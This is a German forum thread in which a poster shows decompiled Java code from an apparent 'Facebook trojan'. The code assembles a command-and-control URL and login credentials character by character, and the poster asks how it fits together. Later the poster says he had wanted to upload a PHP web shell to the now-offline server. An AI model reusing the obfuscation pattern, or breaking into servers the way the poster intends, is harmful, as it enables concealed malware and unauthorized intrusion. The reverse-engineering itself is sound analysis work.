Hi,
ich hab eine *.jar decompeliert, und guck jetzt einwenig in den Code herum.
Dabei ist mir die URL aufgefallen.
Bei der URL bin ich jetzt bei
http://
neposopuhote.redirectment
:83
/service/index.php
Wie setzt sich das ganze zusammen?
Danke
###
this.session = ("" + System.currentTimeMillis());
this.domain = "n"; this.serviceUrl = "h"; this.domain += "e"; this.domain += "p"; this.serviceUrl += "t"; this.domain += "o";
this.domain += "s"; this.domain += "o"; this.domain += "p"; this.domain += "u"; this.serviceUrl += "t"; this.domain += "h"; this.domain += "o"; this.domain += "t";
this.domain += "e";
this.domain += ".";
this.domain += "r";
this.serviceUrl += "p";
this.domain += "e";
this.domain += "d";
this.domain += "i";
this.pwd = this.number;
this.pwd += "d";
this.domain += "r";
this.serviceUrl += ":";
this.domain += "e";
this.domain += "c";
this.pwd += "w";
this.usr = "u";
this.domain += "t";
this.domain += "m";
this.domain += "e";
this.usr += "s";
this.serviceUrl += "/"; this.domain += ".";
this.serviceUrl += "/";
this.domain += "n";
this.domain += "e";
this.domain += "t";
this.serviceUrl += this.domain;
this.serviceUrl += ":";
this.serviceUrl += "8"; this.serviceUrl += "3"; this.serviceUrl += "/";
this.serviceUrl += "s";
this.serviceUrl += "e";
this.serviceUrl += "r";
this.usr += "r";
this.serviceUrl += "v";
this.serviceUrl += "i";
this.serviceUrl += "c";
this.serviceUrl += "e";
this.serviceUrl += "/";
this.serviceUrl += "i";
this.serviceUrl += "n";
this.serviceUrl += "d";
this.serviceUrl += "e";
this.serviceUrl += "x";
this.serviceUrl += ".";
this.serviceUrl += "p";
this.serviceUrl += "h";
this.serviceUrl += "p";
this.pwd += "p";
this.usr += this.number;
Das Ding ist in Viren usw, weils in einem "Facebook Trojaner" ist
Viren, Spyware, Datenschutz 11.214 Themen, 94.187 Beiträge
Da hatte ich wohl n dreher in der URL.
Mittlerweile ist die (Arcor)IP, und auch die NoIP Weiterleitung offline. Schade, hätt da gern eine phpShell hochgeladen. Naja, dann halt nächstemal
Ich hab ja nur den URL User/PW Teil eingefügt., da sind ja mehrere *.class Dateien, auch in dieser hier steht noch einiges mehr drin.
Aufjedenfall danke auch für die Erklärung, und den Ausgabe Code, beim nächsten Trojaner wird der Code wohl auch funktionieren, da this.session, this.domain usw wohl immer drin stehen wird, dann brauch ich nicht mehr stundenland suchen, und zusammensetzen :)
Danke